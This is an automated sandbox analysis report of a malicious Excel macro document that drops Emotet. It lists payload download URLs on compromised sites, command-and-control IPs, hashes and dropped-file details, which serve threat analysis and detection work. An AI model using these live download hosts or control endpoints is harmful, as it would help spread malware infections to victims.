                            http://imaginariumstore.fun/ncsbpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.172/ee/ss/se.pngPE3powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://mypurealsystem.com/App_Start/Rhh8lKO/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://ecobaby.pi-dh.com/Serendpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://3-fasen.com/wp-content/3Bpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://onexone.elementor.cloud/cpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://mypurealsystem.com/App_Spowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMcsv%lwGrundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net0Drundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://servername/isapibackend.dllrundll32.exe, 00000011.00000002.665515752.00000000038C0000.00000002.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://3-fasen.com/wp-content/3Bl0hBbW/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://3-fasen.cpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://engaz.shop/wp-content/MOlpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEezOwGrundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://devbhoomigaushala.org/Getpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://mypurealsystem.com/App_Start/Rhh8lKO/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMrundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.entrust.net/server1.crl0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://74.207.230.120/Orundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://vn.minino.com/wp-admin/c3WQa/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/ee/ss/se.htmlhttp://91.240.118.172/ee/ss/se.htmlmshta.exe, 00000006.00000003.414502711.0000000003145000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://vn.minino.com/wp-admin/c3WQa/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEerundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://139.196.72.155/rundll32.exe, 00000011.00000002.663342975.000000000047A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://91.240.118.172powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.protware.commshta.exe, 00000006.00000003.428385382.000000000405D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428149840.0000000000530000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://91.240.118.172/ee/ss/se.htmlimshta.exe, 00000006.00000003.428424323.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.427844761.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412617394.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.433058972.00000000040DC000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://tamiladsense.compowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://onexone.epowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://vn.minino.com/wp-admin/cpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://tunbridgeservices.com/jfoeqhxz/zOX0/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/ee/ss/se.htmlfunctionmshta.exe, 00000006.00000003.415186421.000000000314D000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.piriform.com/ccleanerpowershell.exe, 00000008.00000002.663093888.0000000000277000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://secure.comodo.com/CPS0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://91.240.11xrundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://crl.entrust.net/2048ca.crl0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://engaz.shopowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://74.207.230.120/drundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562416
Start date: 28.01.2022
Start time: 21:14:11
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: DOCUMENT_2801.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@25/9@1/35
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 29.4% (good quality ratio 27.8%)
• Quality average: 72.2%
• Quality standard deviation: 25.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 43
• Number of non-executed functions: 215
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 92.123.101.187, 92.123.101.210, 92.123.101.218, 92.123.101.179, 92.123.101.225, 92.123.101.169, 92.123.101.211
• Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target mshta.exe, PID 2696 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 1708 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
21:14:19  API Interceptor  60x Sleep call for process: mshta.exe modified
21:14:22  API Interceptor  432x Sleep call for process: powershell.exe modified
21:14:39  API Interceptor  205x Sleep call for process: rundll32.exe modified
                                                                                                                    • 66.42.57.149
                                                                                                                    info_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Ylb9.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    HXYM4z2.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    w87Hl.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    zvb7uw.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Q_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    X_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mozi.m.3Get hashmaliciousBrowse
                                                                                                                    • 95.179.227.24
                                                                                                                    2026P-2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mail_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    DIGITALOCEAN-ASNUSDETAILS-145.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    imedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    info_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    No context
                                                                                                                    No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 557056
Entropy (8bit): 7.0041357928485235
Encrypted: false
SSDEEP: 6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGZUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnqyDx6BrWt
MD5: 900A5B681C016FE03EECB59DBC4855A4
SHA1: A96CD94DF4DD7A76F636866E9C79E995E1175F2A
SHA-256: B77B1E649BFF7CC04B78717A35B00CE24441B09F977098B39E31A716BE5E8CAD
SHA-512: 4E0FC66FC0D8672B2A7523329D4A0BC60A664EDEC062C59305DF40CADB890ADE1ED7FAE2C893445C9D199FBCECECC508349D6D3B32DA351EFB7F9A09DE1A24E1
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\Milossd.dll, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Windows\System32\mshta.exe
File Type: data
Category: downloaded
Size (bytes): 11047
Entropy (8bit): 6.178820492137629
Encrypted: false
SSDEEP: 192:aY2WCkQxAJoZ3LRtPBOEIZkh4ShBlFbClc5dkmYsWAiurnCbNPty2P933Gi7bOaI:aYSkuXxOEkkh4glslcGbu7CbRVGradod
MD5: 9CE5F4CBB12B6E393A35F5135C369C48
SHA1: 934F8045C0CDE6ED88BAE93C5541808B02129C4C
SHA-256: D2F41D2E5D866522A11D6632CFBC52F9FC4649E7EFE78F588C218E5C59C4511A
SHA-512: A53D222AE62B9AC4073357E78EB0215974E05B1145AC864B60A3CC98FF15299EA3BD0C6445A9AF90FA5A7BC88435493CEF768938A70A8FCEE204F1ADC0A65AD6
Malicious: false
IE Cache URL: http://91.240.118.172/ee/ss/se.html

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.1464700112623651
Encrypted: false
SSDEEP: 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5: 72F5C05B7EA8DD6059BF59F50B22DF33
SHA1: D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256: 1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512: 6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious: false

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 28672
Entropy (8bit): 3.4082156922514875
Encrypted: false
SSDEEP: 768:XxIk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJZ6ypPn:XxIk3hbdlylKsgqopeJBWhZFGkE+cL2S
MD5: 20919860D1102256C795CB59C08178AE
SHA1: E5F6D7A600E9AE82F355A13342C981EBD98517CD
SHA-256: 7560DC6FC4A3C43879C4087FE5806DBC6B69B9F144D5A96822020D16A407B7AA
SHA-512: DDC8B8B97D8D56629133F9FEF12C1E033933B06ECEDF815C99DE1FFE78DF15FFBF9073E00FDFA715C95D4201872EE528E54E824745152DA95C5C85CBAEE6F89E
Malicious: false

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5813271999656315
Encrypted: false
SSDEEP: 96:chQCQMqWqvsqvJCwo5z8hQCQMqWqvsEHyqvJCworXzdTYzH6UVMWlUVjA2:cWzo5z8WnHnorXzdPUVMRA2
MD5: 9EB84C4053A11C348C20FE0BEBBE23DB
SHA1: 898D07BC06C9B6492DC33B6B84194CB24D7F3C6E
SHA-256: E9844BB96479944A1EC583F985D66D3AD8B7470AE060F625EFB6C92B76E9867F
SHA-512: 01A40427A7E65AE489DC1832494A6D43C73D7A4C6DAB3B3E572185889DD064878EC8F127C22CEC61E6017589D5C318512B84AE2884B1589DBF27DE25A3C98C6F
Malicious: false
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8016
                                                                                                                    Entropy (8bit):3.5813271999656315
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:chQCQMqWqvsqvJCwo5z8hQCQMqWqvsEHyqvJCworXzdTYzH6UVMWlUVjA2:cWzo5z8WnHnorXzdPUVMRA2
                                                                                                                    MD5:9EB84C4053A11C348C20FE0BEBBE23DB
                                                                                                                    SHA1:898D07BC06C9B6492DC33B6B84194CB24D7F3C6E
                                                                                                                    SHA-256:E9844BB96479944A1EC583F985D66D3AD8B7470AE060F625EFB6C92B76E9867F
                                                                                                                    SHA-512:01A40427A7E65AE489DC1832494A6D43C73D7A4C6DAB3B3E572185889DD064878EC8F127C22CEC61E6017589D5C318512B84AE2884B1589DBF27DE25A3C98C6F
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):91648
                                                                                                                    Entropy (8bit):6.8970131412860605
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:ZxIk3hbdlylKsgqopeJBWhZFGkE+cL2NdA/6yH5Eb7EdrpFkkGX/sGC6ORQQDBhO:ZSk3hbdlylKsgqopeJBWhZFGkE+cL2NH
                                                                                                                    MD5:8A307768DFEF529EFD715E73A760B6F6
                                                                                                                    SHA1:85D4535736310A907B2FF366291B65DB50B3453F
                                                                                                                    SHA-256:FCE66FFF96A52981013AF7D73751A1A7B46EC5DD007D5390903B60A60B714CF5
                                                                                                                    SHA-512:BCAFD16F994C49AE1407D0FA4D38049D7300130EDB88E1C0629EC6D3962964265E48AAF4AF9096AB7795F1635B2C0EAE378736BA8843F43634105941749F8554
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, Author: Joe Security
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.*.h...6..........C.a.l.i.b.r.i. .L.i.g.h.t.1.
                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.0041357928485235
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGZUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnqyDx6BrWt
                                                                                                                    MD5:900A5B681C016FE03EECB59DBC4855A4
                                                                                                                    SHA1:A96CD94DF4DD7A76F636866E9C79E995E1175F2A
                                                                                                                    SHA-256:B77B1E649BFF7CC04B78717A35B00CE24441B09F977098B39E31A716BE5E8CAD
                                                                                                                    SHA-512:4E0FC66FC0D8672B2A7523329D4A0BC60A664EDEC062C59305DF40CADB890ADE1ED7FAE2C893445C9D199FBCECECC508349D6D3B32DA351EFB7F9A09DE1A24E1
                                                                                                                    Malicious:false
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
                                                                                                                    Entropy (8bit):6.862007600534603
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:DOCUMENT_2801.xls
                                                                                                                    File size:92340
                                                                                                                    MD5:3f397d9cca325167d86d575896d40207
                                                                                                                    SHA1:54b8106c1715eb58230371fa033cbdec1e3aaeff
                                                                                                                    SHA256:f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
                                                                                                                    SHA512:ab12fc057dae37f8a39092ee4995a114dca0641041408b09514346e7b474bae4e35d283c7e8e31ca120a88563c6c5e35c6ecd50bd633a4dc7202641158357946
                                                                                                                    SSDEEP:1536:8xIk3hbdlylKsgqopeJBWhZFGkE+cL2NdA/6yH5Eb7EdrpFkkGX/sGC6ORQQDBh+:8Sk3hbdlylKsgqopeJBWhZFGkE+cL2Nx
                                                                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                                                                    Icon Hash:e4eea286a4b4bcb4
                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1
                                                                                                                    Has Summary Info:True
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:
                                                                                                                    Flash Objects Count:
                                                                                                                    Contains VBA Macros:True
                                                                                                                    Code Page:1251
                                                                                                                    Author:xXx
                                                                                                                    Last Saved By:xXx
                                                                                                                    Create Time:2022-01-27 23:33:44
                                                                                                                    Last Saved Time:2022-01-28 07:31:35
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
